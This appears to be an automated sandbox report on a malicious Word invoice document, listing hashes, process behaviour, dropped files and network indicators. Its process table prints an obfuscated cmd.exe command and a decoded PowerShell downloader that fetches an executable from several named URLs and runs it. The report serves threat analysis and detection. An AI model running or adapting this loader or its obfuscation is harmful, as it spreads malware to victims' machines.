analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | Latest invoice - 130793.doc |
| Full analysis: | https://app.any.run/tasks/f79bca32-164d-4519-a5c5-228c406f929d |
| Verdict: | Malicious activity |
| Analysis date: | November 15, 2018, 00:56:44 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 17:27:00 2018, Last Saved Time/Date: Wed Nov 14 17:27:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
| MD5: | 8694071A41C79EB6BEBCDF4B855A5117 |
| SHA1: | E92BC2403494E7AF9AE0896E26054E29B3FF369E |
| SHA256: | E7EAE16A7A10AE1E9DA30C27E010D9B99354E15F1D002AF610B6ACC145C8FDC1 |
| SSDEEP: | 1536:+WzqUocn1kp59gxBK85fBt+a9Jx3GxdxoRlBsRghIxgBqx5xfxEBoxtBBB4xWDP:9M41k/W48DxuxoRlBsRghIxgBqx5xfx9 |
MALICIOUS
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 912)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 912)
SUSPICIOUS
Reads Internet Cache Settings
- powershell.exe (PID: 3072)
Creates files in the user directory
- powershell.exe (PID: 3072)
Executes PowerShell scripts
- cmd.exe (PID: 3916)
INFO
Creates files in the user directory
- WINWORD.EXE (PID: 912)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 912)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| CompObjUserType: | Microsoft Word 97-2003 Document |
|---|---|
| CompObjUserTypeLen: | 32 |
| HeadingPairs: |
|
| TitleOfParts: | - |
| HyperlinksChanged: | No |
| SharedDoc: | No |
| LinksUpToDate: | No |
| ScaleCrop: | No |
| AppVersion: | 16 |
| CharCountWithSpaces: | 14 |
| Paragraphs: | 1 |
| Lines: | 1 |
| Company: | - |
| CodePage: | Windows Latin 1 (Western European) |
| Security: | None |
| Characters: | 13 |
| Words: | 2 |
| Pages: | 1 |
| ModifyDate: | 2018:11:14 17:27:00 |
| CreateDate: | 2018:11:14 17:27:00 |
| TotalEditTime: | - |
| Software: | Microsoft Office Word |
| RevisionNumber: | 1 |
| LastModifiedBy: | - |
| Template: | Normal.dotm |
| Comments: | - |
| Keywords: | - |
| Author: | - |
| Subject: | - |
| Title: | - |
Total processes
34
Monitored processes
3
Malicious processes
1
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 912 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Latest invoice - 130793.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 3916 | c:\wvBQHldjVqOM\YYZXLbOZn\HFAKEUwmzJ\..\..\..\windows\system32\cmd.exe /C"s^e^t ^[-^.=^'O^p^s';$n^Bf^='^htt&&set \^+?^.=^an^e^lapr&&^s^e^t ^#^,^$@=^.^P^at&&^s^e^t '^~=ervi&&s^e^t +^.=^w-Ob^j^ect&&^se^t ^#}^_=e^ll^ ^$z^Zo^=&&s^e^t ^[,*^+=n^t^s&&s^e^t '^`^.=^e&&^se^t ^;^]'^+=^8^@&&^s^et ^#`=^B&&^se^t ^}^`?=^h&&^se^t ^]^_\^*=^T&&^s^et '^\^@=N^Th.^t^yp&&s^e^t ^}`=^://^a^ion&&^s^e^t ^_^`~=^ow^er^s^h&&s^e^t {^]^'\=^.^s^en&&^s^e^t ^~^+=)^;$L^Ai^ ^=N^e&&^se^t ^*`^$=k^e^m^a^ler^k^o^l.net&&set ^-#=jZU);^Start&&s^e^t ^~^$^*=^h&&s^e^t ^-*^'=ht^tp^';$N^T^h^ &&^s^et ^]#^?=^om 'ad^o^d^b.^strea^m^'^;f&&s^e^t ^{^*^`}=n&&^s^e^t ^$.^*^}=v^e&&s^e^t ^@,^`=^.&&^se^t ^[+@^-=^$n&&se^t ?^.,^_=(^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&se^t $^.=^:/&&^se^t ;^?[^#=/n&&s^e^t ^*[^{^#=^m^ana&&^se^t #^{=n^t/&&^s^et ^,]^~=^o&&^se^t ,^?=^=^ Ne&&^s^et *^?,^\=^.^op&&s^e^t @^\^{=^b0^kQ^7&&^se^t ~^\=c^es&&^s^et ^#^]=^p&&^s^e^t #^.^-^'=^T'^,$Lr^G&&^s^e^t $^{`^@=Q&&^se^t `^]^*~=^p^://^zh^an&&^s^et ^.^3bb5484c-acd3-5883-ae5d-000aa204eed3 }=g^jia^b^ir^dn^e^s&&s^e^t .{-=^h^{&&s^e^t ^#^$^.@=^ ^ ^ ^ &&^se^t ]^-@^[=on^s^eB&&^se^t ^#^?=/&&^s^et ^+^{^\=^e ^=^ 1;f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^,^`=com/w^p-c^o&&^se^t .^-=c&&^s^e^t ^\-^@=^ ^-c&&s^e^t ^$^-^+=N&&^s^et ^-*=^i.&&^se^t ^{^+^?^]=n^t^e&&^s^et *^-=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t ^@^-=^od^y)^;&&s^e^t ^+~^.=^d()^;^$N^Th&&s^e^t ^]}=^x^e'&&set \^]^'=^;$L^Ai&&^s^et ^~^#^@^'=^Obj^ec^t&&^s^e^t ^_^}'?=r&&^s^et @^[^,=r^each(f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^$[*^`=()^;&&^se^t ^{~^*=^f)&&^s^e^t ^[^;^#=w^-&&^s^e^t ^,^\{=to^f^i^le&&^se^t '^*=^et^a^.&&^se^t ~^?^]^[=^ ^ &&^s^e^t #^+^*=^h^t^t^p:&&s^e^t ^'^.^#^?='^G^E&&^s^et ^]^`_^@=^$NT^h^.s^a&&^s^et ^{^}=^,0&&se^t ^$^~^[-=r^eak^}&&^s^e^t ^~\^?^}=c&&^s^et ^#^$^,=^y{^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^}^?~^[=co/P^U^x^AY&&^s^e^t ^-^,}^.=-^P&&^se^t @^`=^wr^i^t^e(^$^L^Ai^.r&&^s^e^t ^{^.-=)&&^s^e^t ^,.=^}}^ ^ ^ ^ &&se^t ^~^+^?=^m^@^h^ttp&&^s^e^t ^[_=^.&&^s^e^t {^*=()+^'^\^Kj&&s^e^t @^~=u^p&&s^e^t ^~^_=@')&&^s^et [^}^.=^p^j^x^u'.Sp^l^it(^'&&^se^t ;^[=roc^e^s^s ^$^j^ZU;b&&^s^e^t ;^\^`^*=^h]&&^s^et ^\^-_=^a^tc&&s^e^t ^,}=^L^A&&s^e^t }^\]^[=^e^sp&&s^e^t {^+`=^[S^y^st^e^m.^IO&&^s^e^t ^[^?=^Lr^G ^in^ &&set ^$^@^[=l^o^a^ds/&&^s^e^t \^{^?_=^e&&s^e^t #^.^?=o^m^.^br&&^s^e^t ^+^@^,^.=l^2^.^x^ml&&^s^et ^*^}=^{^t&&^s^e^t '^\^?=t^.&&^s^e^t ^*.=@^ht^t^p://^p&&^s^et ^].=^ ^-c^o^m 'm^s^x^m&&^se^t ^?^~*=;^$j^Z^U^=(&&^se^t ^{?=^i.^o^p^e&&^se^t ^+^*=^:^:^G^et&&s^et [^~#^`=n(&&^se^t ^.^?^]=^Te^mpPa^t&&^se^t ^?^+$=^Y&&^s^e^t ^.}=/&&^s^et ^`^};-=^g^em^e&&s^e^t ^'{=//s^i^tran^t^or.^e^s/^L^d^Lr^6F^8^A@htt^p&&c^al^l ^s^e^t \[?=%^#^]%%^_^`~%%^#}^_%%^[-^.%%`^]^*~%%^.^3bb5484c-acd3-5883-ae5d-000aa204eed3 }%%'^\^?%%^}^?~^[%%^*.%%\^+?^.%%'^*%%.^-%%#^.^?%%^#^?%%@^\^{%%$^{`^@%%^;^]'^+%%#^+^*%%^'{%%^}`%%^*[^{^#%%^`^};-%%^[,*^+%%'^~%%~^\%%^@,^`%%^,^`%%^{^+^?^]%%#^{%%@^~%%^$^@^[%%^~^+^?%%$^.%%^.}%%^*`^$%%;^?[^#%%^?^+$%%[^}^.%%^~^_%%^?^~*%%{^+`%%^#^,^$@%%;^\^`^*%%^+^*%%^.^?^]%%^}^`?%%{^*%%^-*%%'^`^.%%^]}%%^~^+%%^[^;^#%%^~^#^@^'%%^].%%^+^@^,^.%%^-*^'%%,^?%%+^.%%^\-^@%%^]#^?%%^,]^~%%@^[^,%%^[^?%%^[+@^-%%^#`%%^{~^*%%^*^}%%^_^}'?%%^#^$^,%%^,}%%^{?%%[^~#^`%%^'^.^#^?%%#^.^-^'%%^{^}%%^{^.-%%\^]^'%%{^]^'\%%^+~^.%%*^?,^\%%\^{^?_%%^{^*^`}%%^$[*^`%%*^-%%'^\^@%%^+^{^\%%^$^-^+%%^]^_\^*%%^~^$^*%%^[_%%@^`%%}^\]^[%%]^-@^[%%^@^-%%^]^`_^@%%^$.^*^}%%^,^\{%%?^.,^_%%^-#%%^-^,}^.%%;^[%%^$^~^[-%%^~\^?^}%%^\^-_%%.{-%%^,.%%~^?^]^[%%^#^$^.@%&&ca^ll %\[?%"
| c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 3072 | powershell $zZo='Ops';$nBf='http://zhangjiabirdnest.co/PUxAY@http://panelapreta.com.br/b0kQ7Q8@http://sitrantor.es/LdLr6F8A@http://aionmanagementservices.com/wp-content/uploads/m@http://kemalerkol.net/nYpjxu'.Split('@');$jZU=([System.IO.Path]::GetTempPath()+'\Kji.exe');$LAi =New-Object -com 'msxml2.xmlhttp';$NTh = New-Object -com 'adodb.stream';foreach($LrG in $nBf){try{$LAi.open('GET',$LrG,0);$LAi.send();$NTh.open();$NTh.type = 1;$NTh.write($LAi.responseBody);$NTh.savetofile($jZU);Start-Process $jZU;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
Total events
1 338
Read events
936
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 912 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR97E6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NRF69W64D5ELJ4SET05F.temp | — | |
MD5:— | SHA256:— | |||
| 912 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$test invoice - 130793.doc | pgc | |
MD5:06FFCDF506BD184E8D8860522F732706 | SHA256:6895120F9522E96288E8426BE74B3062814C4ED7FE2CEB7E0B72C965F33FA4D5 | |||
| 912 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F12123BE3FC217E2B306FA7D3C1EF718 | SHA256:3C767FE8FEA3E2CCF71ADDB57BE518569265124015C279DC07A0A438B8E20F32 | |||
| 3072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
| 3072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da311.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
| 3072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat | dat | |
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862 | SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3072 | powershell.exe | GET | — | 75.98.168.239:80 | http://zhangjiabirdnest.co/PUxAY/ | US | — | — | suspicious |
3072 | powershell.exe | GET | 301 | 75.98.168.239:80 | http://zhangjiabirdnest.co/PUxAY | US | html | 241 b | suspicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3072 | powershell.exe | 75.98.168.239:80 | zhangjiabirdnest.co | A2 Hosting, Inc. | US | suspicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
zhangjiabirdnest.co |
| suspicious |